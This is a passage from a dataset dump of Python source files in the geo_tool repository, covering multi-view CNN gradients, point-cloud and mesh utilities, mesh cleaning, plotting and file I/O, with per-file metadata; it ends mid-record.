.dropout(keep_prob)\n \n layer = g.fully_connected(layer, NUM_CLASSES, name=\"fc8\")\\\n .relu()\\\n .dropout(keep_prob)\n \n return layer\n\n\ndef compute_3d_inference(input) :\n \n # Reshape to just treat as an array of images.\n in_bundle = tf.reshape(input, [-1, IMG_SIZE[1], IMG_SIZE[0], 1])\n\n # Compute first stage of inference (treating each image independently)\n inf = compute_inferenceA(g.wrap(in_bundle)).unwrap()\n\n # Get the shape of the current inference tensor (from the Conv layers)\n inf_shape = inf.get_shape().as_list()\n \n # Reshape the results again to be in buckets of images per solid\n inf = tf.reshape(inf, [-1, PART_VIEWS, inf_shape[1], inf_shape[2], inf_shape[3]])\n\n # Compute the maximum value across the views and reduce the tensor to that.\n reduce_inf = tf.reduce_max(inf, reduction_indices=1) \n \n # Compute second stage of inference on the max-reduced data (each across all images for a given shape)\n final_inf = compute_inferenceB(g.wrap(reduce_inf, channels=256)).unwrap()\n \n return final_inf\n\n\ndef mvcnn_gradients(): \n pred_layer = compute_3d_inference(image_pl)\n max_class = tf.reduce_max(pred_layer, 1)\n # soft_max = tf.nn.softmax(pred_layer)\n # num_classes = pred_layer.get_shape().as_list()[-1]\n # all_other_classes = tf.div(tf.reduce_sum(pred_layer, 1) - max_class, num_classes)\n grads = tf.gradients(max_class, image_pl)\n return grads \n\n\ndef initialize_session():\n saver = tf.train.Saver()\n ckpt_file = '/Users/t_achlp/Documents/DATA/NN/Models/MVCCN/DG/mvcnn_5_20_70_80.ckpt'\n sess = g.session()\n sess.start()\n in_sess = sess.session\n saver.restore(in_sess, ckpt_file)\n return in_sess\n\ndef compute_gradients(views_folder, grad_model=None, in_sess=None):\n if grad_model is None:\n grad_model = mvcnn_gradients()\n \n if in_sess is None:\n in_sess = initialize_session()\n \n view_tensor, _, _ = nn_io.load_views_of_shape(views_folder, file_format='png', shape_views=PART_VIEWS, reshape_to=IMG_SIZE)\n view_tensor = nn_io.format_image_tensor_for_tf(view_tensor, whiten=True) \n feed = {image_pl: 
view_tensor, keep_prob: 1}\n \n return in_sess.run([grad_model[0]], feed_dict=feed), grad_model, in_sess\n\n\nimport os.path as osp\nimport os\nif __name__ == '__main__': \n top_view_dir = sys.argv[1]\n sub_dirs = [f for f in os.listdir(top_view_dir) if osp.isdir(osp.join(top_view_dir,f))] # expected to be folders of the views.\n sub_dirs = [osp.join(top_view_dir, d) for d in sub_dirs]\n \n res, grad_model, in_sess = compute_gradients(sub_dirs[0])\n np.savez(osp.join(sub_dirs[0], 'raw_grads'), res[0])\n \n for views in sub_dirs[1:]:\n print views \n res = compute_gradients(views, grad_model, in_sess)\n np.savez(osp.join(views, 'raw_grads'), res[0])"
},
{
"alpha_fraction": 0.5467653870582581,
"alphanum_fraction": 0.553780198097229,
"avg_line_length": 32.77631759643555,
"blob_id": "7adfd22f7d04182899d23d76e1f03d2f8b9c342d",
"content_id": "6194485109ce38d6812838df0462fb83fb0f4a4f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2566,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 76,
"path": "/rendering/shape_views.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jul 25, 2016\n\n@author: Panos Achlioptas\n@contact: [email protected]\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport numpy as np\nimport os.path as osp\nimport matplotlib.pylab as plt\n\nfrom .. in_out import soup as nn_io\n\n\nclass Shape_Views():\n '''\n classdocs\n '''\n\n def __init__(self, view_folder, file_format):\n '''\n Constructor\n '''\n data = nn_io.load_views_of_shape(view_folder, file_format)\n self.views = data[0]\n self.cam_pos = data[1]\n self.masks = data[2]\n self.inv_dict = {(pos[0], pos[1]): i for i, pos in enumerate(self.cam_pos)}\n\n def num_views(self):\n return self.views.shape[0]\n\n def image_size(self):\n return self.views[0].shape\n\n def plot(self, vertex_id, twist_id, mask=False):\n index = self.inv_dict[(vertex_id, twist_id)]\n if mask:\n im = self.masks[index, :, :]\n else:\n im = self.views[index, :, :]\n# plt.figure() # TO DO - keep opening new figures\n plt.imshow(im)\n plt.show()\n\n def export_masks_to_txt(self, save_dir):\n '''\n Exports the masks attribute into .txt files. Each file corresponds to one view (vertex_id, twist_id)\n and lists every pixel that belongs in the mask into a separate line.\n '''\n nn_io.create_dir(save_dir)\n for i, mask in enumerate(self.masks):\n y_coord, x_coord = np.where(mask)\n out_file = 'pixels_' + str(self.cam_pos[i][0]) + '_' + str(self.cam_pos[i][1]) + '.txt'\n out_file = osp.join(save_dir, out_file)\n nn_io.write_pixel_list_to_txt(x_coord, y_coord, out_file)\n\n def paint_masks_to_triangle_color(self, bt, tr_color):\n res = np.zeros(self.masks.shape)\n for i, mask in enumerate(self.masks):\n vertex_id, twist_id = self.cam_pos[i]\n if not bt.is_legit_view_and_twist(vertex_id, twist_id): \n raise ValueError('Back_Tracer and View_Gradients don\\'t agree on the set of views.') \n y_coord, x_coord = np.where(mask != 0)\n for x, y in zip(x_coord, y_coord):\n try:\n triangle = bt.from_2D_to_3D((x,y), vertex_id, twist_id)\n res[i,y,x] = tr_color[triangle]\n except:\n pass\n return res\n\nif __name__ == '__main__':\n sv = Shape_Views('../Data/Screw/Views', 'png')\n sv.export_masks_to_txt('../Data/Screw/Masks')"
},
{
"alpha_fraction": 0.6225937008857727,
"alphanum_fraction": 0.6357649564743042,
"avg_line_length": 33.05172348022461,
"blob_id": "1754efbd43e522c5899599de772f556c08492c8d",
"content_id": "3498be3c309a66bb83d2f5ec95049195aa229010",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1974,
"license_type": "permissive",
"max_line_length": 147,
"num_lines": 58,
"path": "/scripts/animate.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on June 14, 2016\n\n@author: Panayotes Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes. \n'''\nimport os\nimport re\nimport cv2\nfrom glob import glob\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\ntry:\n from mayavi import mlab as mayalab\nexcept:\n warnings.warn('Mayavi library was not found. Some graphics utilities will be disabled.')\n \n\[email protected]\[email protected](delay=10)\ndef animate_surface(mesh_surf, output_dir):\n scene = mesh_surf.scene\n camera = scene.camera\n for i in range(36):\n camera.azimuth(10)\n camera.pitch(5)\n scene.reset_zoom()\n yield \n scene.save_png(output_dir + '/anim%d.png'%i)\n\ndef export_animation(animation_dir, animation_name):\n imagelist = load_animation_images(animation_dir)\n fig = plt.figure() # make figure\n im = plt.imshow(imagelist[0]) #TODO fix vmin/vmax for cmap:, cmap=plt.get_cmap('jet'), vmin=np.min(imagelist[0]), vmax=np.max(imagelist[0]))\n # function to update figure\n def updatefig(j): \n im.set_array(imagelist[j])\n return im,\n # kick off the animation\n ani = animation.FuncAnimation(fig, updatefig, frames=len(imagelist), interval=370, blit=False)\n ani.save(os.path.join(animation_dir, animation_name+'.mp4'))\n \ndef load_animation_images(folder, file_format='png'):\n searh_pattern = os.path.join(folder, '*.' + file_format) \n im_names = [n for n in glob(searh_pattern)]\n im_order = list()\n image_data = list()\n for name in im_names:\n m = re.search('(\\d+).png$', name)\n im_order.append(int(m.groups()[0]))\n \n visit = ([i[0] for i in sorted(enumerate(im_order), key=lambda x:x[1])])\n \n for im_id in visit:\n image_data.append(cv2.imread(im_names[im_id], cv2.IMREAD_UNCHANGED)) \n return image_data"
},
{
"alpha_fraction": 0.5644097924232483,
"alphanum_fraction": 0.5772266983985901,
"avg_line_length": 35.747440338134766,
"blob_id": "32262f63f7eae6f64efa8031e46942918766ff0c",
"content_id": "c44322e92c01e08e39c0d9043cebe7a0d9c35d4b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10767,
"license_type": "permissive",
"max_line_length": 202,
"num_lines": 293,
"path": "/point_clouds/point_cloud.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on December 8, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\n\nimport copy\nimport warnings\nimport numpy as np\nimport matplotlib.cm as cm \nfrom scipy.linalg import eigh\nfrom numpy.matlib import repmat\nfrom six.moves import cPickle\n\ntry:\n from sklearn.neighbors import NearestNeighbors\nexcept:\n warnings.warn('Sklearn library is not installed.')\n\ntry:\n import matplotlib.pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D\nexcept:\n warnings.warn('Pyplot library is not fully working. Limited plotting utilities are available.')\n\nfrom .. external_code.python_plyfile.plyfile import PlyElement, PlyData\nfrom .. in_out import soup as io\nfrom .. utils import linalg_utils as utils\nfrom .. fundamentals import Cuboid\n\nl2_norm = utils.l2_norm\n\n\nclass Point_Cloud(object):\n '''\n A class representing a 3D Point Cloud.\n Dependencies:\n 1. plyfile 0.4: PLY file reader/writer. DOI: https://pypi.python.org/pypi/plyfile\n '''\n def __init__(self, points=None, ply_file=None):\n '''\n Constructor\n '''\n if ply_file is not None:\n self.points = io.load_ply(ply_file)\n else:\n self.points = points\n\n @property\n def points(self):\n return self._points\n\n @points.setter\n def points(self, value):\n self._points = value\n self.num_points = len(self._points)\n\n def __str__(self):\n return 'Point Cloud with %d points.' % (self.num_points)\n\n def __getitem__(self, key):\n return self.points[key]\n\n def save(self, file_out):\n with open(file_out, \"wb\") as f_out:\n cPickle.dump(self, f_out, protocol=2)\n\n def copy(self):\n return copy.deepcopy(self)\n\n def permute_points(self, permutation):\n if len(permutation) != 3 or not np.all(np.equal(sorted(permutation), np.array([0, 1, 2]))):\n raise ValueError()\n self.points = self.points[:, permutation]\n return self\n\n def sample(self, n_samples, replacement=False):\n if n_samples > self.num_points:\n replacement = True\n rindex = np.random.choice(self.num_points, n_samples, replace=replacement)\n return Point_Cloud(points=self.points[rindex, :]), rindex\n\n def apply_mask(self, bool_mask):\n return Point_Cloud(self.points[bool_mask, :])\n\n def bounding_box(self):\n return Cuboid.bounding_box_of_3d_points(self.points)\n\n def center_in_unit_sphere(self):\n self.points = Point_Cloud.center_points(self.points, center='unit_sphere')\n return self\n\n def center_in_unit_cube(self):\n self.points = Point_Cloud.center_points(self.points, center='unit_cube')\n return self\n\n def plot(self, show=True, show_axis=True, in_u_sphere=True, marker='.', s=8, alpha=.8, figsize=(5, 5), color='b', elev=10, azim=240, axis=None, title=None, colormap=cm.viridis, *args, **kwargs):\n x = self.points[:, 0]\n y = self.points[:, 1]\n z = self.points[:, 2]\n\n if 'c' in kwargs: # You can't provide both 'c' and 'color'.\n color = None\n\n return Point_Cloud.plot_3d_point_cloud(x, y, z, show=show, show_axis=show_axis, in_u_sphere=in_u_sphere, marker=marker, s=s, alpha=alpha, figsize=figsize,\n color=color, axis=axis, elev=elev, azim=azim, \n title=title, *args, **kwargs)\n\n def barycenter(self):\n return np.mean(self.points, axis=0)\n\n def lex_sort(self, axis=-1):\n '''Sorts the list storing the points of the Point_Cloud in a lexicographical order.\n See numpy.lexsort\n '''\n lex_indices = np.lexsort(self.points.T, axis=axis)\n self.points = self.points[lex_indices, :]\n return self, 
lex_indices\n\n def k_nearest_neighbors(self, k):\n # TODO: Add kwargs of sklearn function\n nn = NearestNeighbors(n_neighbors=k + 1).fit(self.points)\n distances, indices = nn.kneighbors(self.points)\n return indices[:, 1:], distances[:, 1:]\n\n def normals_lsq(self, k, unit_norm=False):\n '''Least squares normal estimation from point clouds using PCA.\n Args:\n k (int) indicating how many neighbors the normal estimation is based upon.\n\n DOI: H. Hoppe, T. DeRose, T. Duchamp, J. McDonald, and W. Stuetzle.\n Surface reconstruction from unorganized points. In Proceedings of ACM Siggraph, pages 71:78, 1992.\n '''\n neighbors, _ = self.k_nearest_neighbors(k)\n points = self.points\n n_points = self.num_points\n N = np.zeros([n_points, 3])\n for i in xrange(n_points):\n x = points[neighbors[i], :]\n p_bar = (1.0 / k) * np.sum(x, axis=0)\n P = (x - repmat(p_bar, k, 1))\n P = (P.T).dot(P)\n [L, E] = eigh(P)\n idx = np.argmin(L)\n N[i, :] = E[:, idx]\n if unit_norm:\n row_norms = np.linalg.norm(N, axis=1)\n N = (N.T / row_norms).T\n return N\n\n def rotate_z_axis_by_degrees(self, theta, clockwise=True):\n theta = np.deg2rad(theta)\n cos_t = np.cos(theta)\n sin_t = np.sin(theta)\n R = np.array([[cos_t, -sin_t, 0],\n [sin_t, cos_t, 0],\n [0, 0, 1]])\n if not clockwise:\n R = R.T\n\n self.points = self.points.dot(R)\n return self\n\n def translate(self, trans_vector):\n self.points += trans_vector\n return self\n\n def align_to_other_pc(self, other_pc):\n ''' Stretches and translates given pc to match the extrema of the `other_pc`.\n Note: Doesn't apply rotation. Transformation applied online\n '''\n a_xmin, a_ymin, a_zmin, a_xmax, a_ymax, a_zmax = self.bounding_box().extrema\n b_xmin, b_ymin, b_zmin, b_xmax, b_ymax, b_zmax = other_pc.bounding_box().extrema\n x_ratio = (b_xmax - b_xmin) / (a_xmax - a_xmin)\n y_ratio = (b_ymax - b_ymin) / (a_ymax - a_ymin)\n z_ratio = (b_zmax - b_zmin) / (a_zmax - a_zmin)\n self.points[:, 0] *= x_ratio\n self.points[:, 1] *= y_ratio\n self.points[:, 2] *= z_ratio\n a_xmin, a_ymin, a_zmin, a_xmax, a_ymax, a_zmax = self.bounding_box().extrema\n trans_vector = np.array([(b_xmin - a_xmin), (b_ymin - a_ymin), (b_zmin - a_zmin)])\n return self.translate(trans_vector)\n\n def center_axis(self, axis=None):\n '''Makes the point-cloud to be equally spread around zero on the particular axis, i.e., to be centered. If axis is None, it centers it in all (x,y,z) axis.\n '''\n if axis is None:\n _, g0 = self.center_axis(axis=0)\n _, g1 = self.center_axis(axis=1)\n _, g2 = self.center_axis(axis=2)\n return self, [g0, g1, g2]\n else:\n r_max = np.max(self.points[:, axis])\n r_min = np.min(self.points[:, axis])\n gap = (r_max + r_min) / 2.0\n self.points[:, axis] -= gap\n return self, gap\n\n def save_as_ply(self, file_out, normals=None, color=None, binary=True):\n io.save_as_ply(self.points, file_out, normals=normals, color=color, binary=binary)\n\n def is_in_unit_sphere(self, epsilon=10e-5):\n return np.max(l2_norm(self.points, axis=1)) <= (0.5 + epsilon)\n\n def is_in_unit_cube(self, epsilon=10e-5):\n return np.max(abs(self.points)) <= (0.5 + epsilon)\n\n def is_centered_in_origin(self, epsilon=10e-5):\n '''True, iff the extreme values (min/max) of each axis (x,y,z) are symmetrically placed\n around the origin.\n '''\n return np.all(abs(np.max(self.points, 0) + np.min(self.points, 0)) < epsilon)\n\n @staticmethod\n def center_points(points, epsilon=10e-5, center='unit_sphere', force_scaling=False):\n ''' It will center the points to be symmetricaly places around the (0,0,0). 
It will also apply uniform scaling according to `center` and `force_scaling`.\n Input:\n center: 'unit_sphere' or 'unit_cube'\n force_scaling: boolean, if True, then even if the points are already inside the unit sphere/cube it will stretch them so that the (maximum) anti-diametric points lie exactly on the boundary.\n '''\n pc = Point_Cloud(points)\n\n if not pc.is_centered_in_origin(epsilon=epsilon):\n pc.center_axis()\n\n if center == 'unit_sphere':\n if not pc.is_in_unit_sphere(epsilon=epsilon) or force_scaling:\n max_dist = np.max(l2_norm(points, axis=1)) # Make max distance equal to one.\n pc.points /= (max_dist * 2.0)\n\n elif center == 'unit_cube':\n if not pc.is_in_unit_cube(epsilon=epsilon) or force_scaling:\n cb = Cuboid.bounding_box_of_3d_points(pc.points)\n max_dist = cb.diagonal_length()\n pc.points /= max_dist\n else:\n raise ValueError()\n\n return pc.points\n\n @staticmethod\n def plot_3d_point_cloud(x, y, z, show=True, show_axis=True, in_u_sphere=False, marker='.', s=8, alpha=.8,\n figsize=(5, 5), elev=10, azim=240, axis=None, title=None, *args, **kwargs):\n \"\"\" Plot a 3d point-cloud via matplotlib.\n :param x: iterable of N floats, representing the x-coordinates of a 3D pointcloud\n :param y: iterable of N floats, representing the y-coordinates of a 3D pointcloud\n :param z: iterable of N floats, representing the z-coordinates of a 3D pointcloud\n \"\"\"\n\n if axis is None:\n fig = plt.figure(figsize=figsize)\n ax = fig.add_subplot(111, projection='3d') \n else:\n ax = axis\n fig = axis\n \n if title is not None:\n plt.title(title)\n\n sc = ax.scatter(x, y, z, marker=marker, s=s, alpha=alpha, *args, **kwargs)\n ax.view_init(elev=elev, azim=azim)\n\n if in_u_sphere:\n ax.set_xlim3d(-0.5, 0.5)\n ax.set_ylim3d(-0.5, 0.5)\n ax.set_zlim3d(-0.5, 0.5)\n else:\n miv = 0.7 * np.min([np.min(x), np.min(y), np.min(z)]) # Multiply with 0.7 to squeeze free-space.\n mav = 0.7 * np.max([np.max(x), np.max(y), np.max(z)])\n ax.set_xlim(miv, mav)\n ax.set_ylim(miv, mav)\n ax.set_zlim(miv, mav)\n plt.tight_layout()\n\n if not show_axis:\n plt.axis('off')\n\n if 'c' in kwargs:\n plt.colorbar(sc)\n\n if show:\n plt.show()\n\n return fig\n\n @staticmethod\n def load(in_file):\n with open(in_file, 'rb') as f_in:\n res = cPickle.load(f_in)\n return res\n"
},
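A short sketch of the Point_Cloud API defined above; the import path is inferred from the record's `path` field (`point_clouds/point_cloud.py`) and is an assumption:

    import numpy as np
    from geo_tool.point_clouds.point_cloud import Point_Cloud  # inferred path; an assumption

    pc = Point_Cloud(points=np.random.rand(5000, 3).astype(np.float32))
    pc.center_in_unit_sphere()          # centers and rescales the points in-place
    sub_pc, index = pc.sample(1024)     # random subsample (without replacement here)
    print(pc, sub_pc, pc.is_in_unit_sphere())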
{
"alpha_fraction": 0.6458919048309326,
"alphanum_fraction": 0.6510167121887207,
"avg_line_length": 32.793296813964844,
"blob_id": "302da167358c2c18dabf532ec1f5c2c94e2361e0",
"content_id": "ca57a361cf980c3a2e7a2fa03cea0232b459c568",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6049,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 179,
"path": "/solids/mesh_cleaning.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on June 14, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport numpy as np\nimport warnings\nfrom collections import defaultdict\n\nfrom general_tools.arrays.basics import unique_rows\n\nfrom .. utils import linalg_utils as linalg_utils\n\n\ndef filter_vertices(self, keep_list):\n '''Filters the mesh to contain only the vertices in the input ``keep_list``.\n Also, it discards any triangles that do not contain vertices that all belong in the list.\n All changes happen in-place.\n TODO: speed_up\n '''\n\n if len(keep_list) == 0:\n raise ValueError('Provided list of nodes is empty.')\n keep_list = np.unique(keep_list)\n delete_index = set(np.arange(self.num_vertices)) - set(keep_list)\n new_order = linalg_utils.order_of_elements_after_deletion(self.num_vertices, list(delete_index))\n self.vertices = self.vertices[keep_list, :]\n clean_triangles = np.array([set(tr) - delete_index == set(tr) for tr in self.triangles.tolist()])\n clean_triangles = self.triangles[clean_triangles]\n for x in np.nditer(clean_triangles, op_flags=['readwrite']):\n x[...] = new_order[int(x)]\n self.triangles = clean_triangles\n return self\n\n\ndef filter_triangles(self, keep_list):\n if len(keep_list) == 0:\n raise ValueError('Provided list of nodes is empty.')\n\n self.triangles = self.triangles[keep_list, :]\n return self\n\n\ndef isolated_vertices(self):\n '''Returns the set of vertices that do not belong in any triangle.\n '''\n\n referenced = set(self.triangles.ravel())\n if len(referenced) == self.num_vertices:\n return set()\n else:\n return set(np.arange(self.num_vertices)) - referenced\n\n\ndef has_identical_triangles(self):\n new_tr = unique_rows(self.triangles)\n return len(new_tr) != self.num_triangles\n\n\ndef clean_identical_triangles(self, verbose=False):\n new_tr = unique_rows(self.triangles)\n if len(new_tr) != self.num_triangles:\n if verbose:\n print('Identical triangles were detected and are being deleted.')\n self.triangles = new_tr\n return self\n\n\ndef _get_non_duplicate_triangles(self):\n eqc = defaultdict(list)\n for i, row in enumerate(self.triangles):\n eqc[tuple(sorted(row))].append(i)\n return [min(v_id) for v_id in eqc.values()]\n\n\ndef has_duplicate_triangles(self):\n good_tr = _get_non_duplicate_triangles(self)\n return self.num_triangles != len(good_tr)\n\n\ndef clean_duplicate_triangles(self, verbose=False):\n '''Removed the duplicate triangles of a mesh. 
Two triangles are considered duplicate of each other if they\n reference the same set of vertices.\n '''\n keep_list = _get_non_duplicate_triangles(self)\n if self.num_triangles != len(keep_list):\n if verbose:\n print('Duplicate triangles were detected and are being deleted.')\n self.triangles = self.triangles[keep_list, :]\n return self\n\n\ndef clean_degenerate_triangles(self, verbose=False):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n A = self.area_of_triangles()\n good_tr = A > 0\n if np.sum(good_tr) != self.num_triangles:\n if verbose:\n print('Deleting triangles with zero area.')\n self.triangles = self.triangles[good_tr, :]\n\n assert(all(self.area_of_triangles() > 0))\n\n A = self.angles_of_triangles()\n bad_triangles = np.where((A == 0).any(axis=1))[0]\n if bad_triangles.size > 0:\n if verbose:\n print('Deleting triangles containing angles that are 0 degrees.')\n keep = list(set(range(self.num_triangles)) - set(bad_triangles))\n self = filter_triangles(self, keep)\n return self\n\n\ndef clean_zero_area_vertices(self, verbose=False):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n A = self.area_of_vertices()\n bad_vert = np.where(A <= 0)[0]\n if bad_vert.size > 0:\n if verbose:\n print('Deleting vertices with zero area.')\n keep_list = list(set(range(self.num_vertices)) - set(bad_vert))\n self = filter_vertices(self, keep_list)\n assert(all(self.area_of_vertices() > 0))\n return self\n\n\ndef clean_isolated_vertices(self, verbose=False):\n bad_vertices = isolated_vertices(self)\n if bad_vertices:\n if verbose:\n print('Deleting isolated vertices.')\n keep_list = list(set(range(self.num_vertices)) - bad_vertices)\n self = filter_vertices(self, keep_list)\n return self\n\n\ndef clean_identical_vertices(self, verbose=False):\n '''Removes any vertex that has exactly the same (x,y,z) coordinates with another\n vertex.\n Notes: Let v1 and v2 be two duplicate vertices and v2 being the one that will be removed.\n All the triangles that reference v2, will now reference v1.\n '''\n eqc = defaultdict(list)\n for i, row in enumerate(self.vertices):\n eqc[tuple(row)].append(i)\n\n check_list = [sorted(c) for c in eqc.values() if len(c) > 1]\n if check_list:\n if verbose:\n print('Duplicate vertices were detected and are being deleted.')\n\n keep_list = [min(v_id) for v_id in eqc.values()]\n T = self.triangles.ravel()\n for v_id in check_list:\n ix = np.in1d(T, v_id[1:]).reshape(T.shape)\n T[ix] = v_id[0]\n\n self.triangles = T.reshape(self.triangles.shape)\n filter_vertices(self, keep_list)\n clean_identical_triangles(self) # TODO - don't clean. Let caller do that.\n return self\n\n\ndef clean_mesh(self, level=3, verbose=False):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n clean_degenerate_triangles(self, verbose)\n if level >= 2:\n clean_zero_area_vertices(self, verbose)\n clean_isolated_vertices(self, verbose)\n clean_identical_triangles(self, verbose)\n if level == 3:\n clean_duplicate_triangles(self, verbose)\n return self\n"
},
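A sketch of how the cleaning pipeline above could be driven; the functions take the mesh as an explicit first argument and mutate it in place, and the import paths are inferred from the records above (an assumption):

    from geo_tool.solids.mesh import Mesh                 # inferred paths; assumptions
    from geo_tool.solids.mesh_cleaning import clean_mesh

    mesh = Mesh(file_name='noisy_scan.off')               # placeholder input file
    # level=3 runs the whole cascade: degenerate triangles, zero-area and
    # isolated vertices, identical triangles, then duplicate triangles.
    clean_mesh(mesh, level=3, verbose=True)
    print(mesh)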
{
"alpha_fraction": 0.6130992770195007,
"alphanum_fraction": 0.628291666507721,
"avg_line_length": 30.510639190673828,
"blob_id": "1098efef999053fa3441d4ce43448e5123cac753",
"content_id": "99d0bfddeb4f06f85a8a5393cb1a93523117a5c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2962,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 94,
"path": "/solids/plotting.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Dec 30, 2017\n\n@author: optas\n'''\n\nimport numpy as np\nimport matplotlib.pylab as plt\nimport matplotlib.cm as cm\n\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom plotly.graph_objs import Mesh3d, Data, Scatter3d, Line\nfrom plotly.offline import iplot\n\nfrom .. point_clouds import Point_Cloud\n\n\ndef plot_mesh_via_matplotlib(in_mesh, in_u_sphere=True, axis=None, figure=None, \n figsize=(5, 5), gspec=111, colormap=cm.viridis, plot_edges=False, vertex_color=None, show=True):\n '''Alternative to plotting a mesh with matplotlib.'''\n\n faces = in_mesh.triangles\n verts = in_mesh.vertices\n\n if in_u_sphere:\n verts = Point_Cloud(verts).center_in_unit_sphere().points\n\n if figure is None:\n fig = plt.figure(figsize=figsize)\n else:\n fig = figure\n\n if axis is None:\n ax = fig.add_subplot(gspec, projection='3d')\n else:\n ax = axis\n\n mesh = Poly3DCollection(verts[faces])\n\n if plot_edges:\n mesh.set_edgecolor('k')\n\n if vertex_color is not None:\n face_color = in_mesh.triangle_weights_from_vertex_weights(vertex_color)\n mappable = cm.ScalarMappable(cmap=colormap)\n colors = mappable.to_rgba(face_color)\n colors[:, 3] = 1\n mesh.set_facecolor(colors)\n\n ax.add_collection3d(mesh)\n ax.set_xlabel(\"x-axis\")\n ax.set_ylabel(\"y-axis\")\n ax.set_zlabel(\"z-axis\")\n\n miv = 0.7 * np.min(verts) # multiply with 0.7 to squeeze empty space.\n mav = 0.7 * np.max(verts)\n ax.set_xlim(miv, mav)\n ax.set_ylim(miv, mav)\n ax.set_zlim(miv, mav)\n plt.tight_layout()\n\n if show:\n plt.show()\n else:\n return fig\n\n\ndef plot_mesh_via_plotly(in_mesh, colormap=cm.RdBu, plot_edges=None, vertex_color=None, show=True):\n '''Alternative to plotting a mesh with plotly.'''\n x = in_mesh.vertices[:, 0]\n y = in_mesh.vertices[:, 1]\n z = in_mesh.vertices[:, 2]\n simplices = in_mesh.triangles\n tri_vertices = map(lambda index: in_mesh.vertices[index], simplices) # vertices of the surface triangles\n I, J, K = ([triplet[c] for triplet in simplices] for c in range(3))\n\n triangles = Mesh3d(x=x, y=y, z=z, i=I, j=J, k=K, name='', intensity=vertex_color)\n\n if plot_edges is None: # The triangle edges are not plotted.\n res = Data([triangles])\n else:\n # Define the lists Xe, Ye, Ze, of x, y, resp z coordinates of edge end points for each triangle\n # None separates data corresponding to two consecutive triangles\n lists_coord = [[[T[k % 3][c] for k in range(4)] + [None] for T in tri_vertices] for c in range(3)]\n Xe, Ye, Ze = [reduce(lambda x, y: x + y, lists_coord[k]) for k in range(3)]\n\n # Define the lines to be plotted\n lines = Scatter3d(x=Xe, y=Ye, z=Ze, mode='lines', line=Line(color='rgb(50, 50, 50)', width=1.5))\n res = Data([triangles, lines])\n\n if show:\n iplot(res)\n else:\n return res\n"
},
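A minimal, matplotlib-only demo of plot_mesh_via_matplotlib above, using a single triangle as stand-in data; the import paths follow the records' `path` fields and are assumptions:

    import numpy as np
    from geo_tool.solids.mesh import Mesh                     # inferred paths; assumptions
    from geo_tool.solids.plotting import plot_mesh_via_matplotlib

    # One triangle spanning the three unit-axis points.
    tri = Mesh(vertices=np.eye(3, dtype=np.float32), triangles=np.array([[0, 1, 2]]))
    plot_mesh_via_matplotlib(tri, plot_edges=True)            # opens a matplotlib 3D window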
{
"alpha_fraction": 0.553430438041687,
"alphanum_fraction": 0.5674128532409668,
"avg_line_length": 37.0247917175293,
"blob_id": "64cf52d56bc8ab43d47356b4daa02b56bacb308f",
"content_id": "e2fc50021faffa70a45d434b9946637e3dd2c88d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13803,
"license_type": "permissive",
"max_line_length": 185,
"num_lines": 363,
"path": "/in_out/soup.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on June 14, 2016\n\n@author: Panos Achlioptas\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport os\nimport warnings\nimport re\nimport numpy as np\nfrom glob import glob\nfrom .. external_code.python_plyfile.plyfile import PlyElement, PlyData\n\ntry:\n import cv2\nexcept:\n warnings.warn('OpenCV library is not installed.')\n\n# TODO Break down in more in_out modules\n\n\ndef per_image_whitening(image):\n '''Linearly scales image to have zero mean and unit (variance) norm. The transformation is happening in_place.\n '''\n if image.dtype != np.float32:\n image = image.astype(np.float32, copy=False)\n\n if image.ndim == 2:\n n_elems = np.prod(image.shape)\n image -= np.mean(image)\n image /= max(np.std(image), 1.0 / np.sqrt(n_elems)) # Cap stdev away from zero.\n else:\n raise NotImplementedError\n\n assert(np.allclose([np.mean(image), np.var(image)], [0, 1], atol=1e-05, rtol=0))\n return image\n\n\ndef name_to_cam_position(file_name, cam_delim='-'):\n '''Given a filename produced by the FyThumb program, return the camera positions (vertex id) and\n rotation angle of the underlying rendered image file.\n '''\n file_name = os.path.basename(file_name)\n match = re.search(r'%s?(\\d+)%s(\\d+)' % (cam_delim, cam_delim), file_name)\n cam_index = int(match.group(1))\n rot_index = int(match.group(2))\n return [cam_index, rot_index]\n\n\ndef read_triangle_file(file_name):\n with open(file_name, 'r') as f_in:\n all_lines = f_in.readlines()\n n = len(all_lines)\n triangles = np.empty((n, 3), dtype=np.int32)\n pixels = np.empty((n, 2), dtype=np.int32)\n hit_coords = 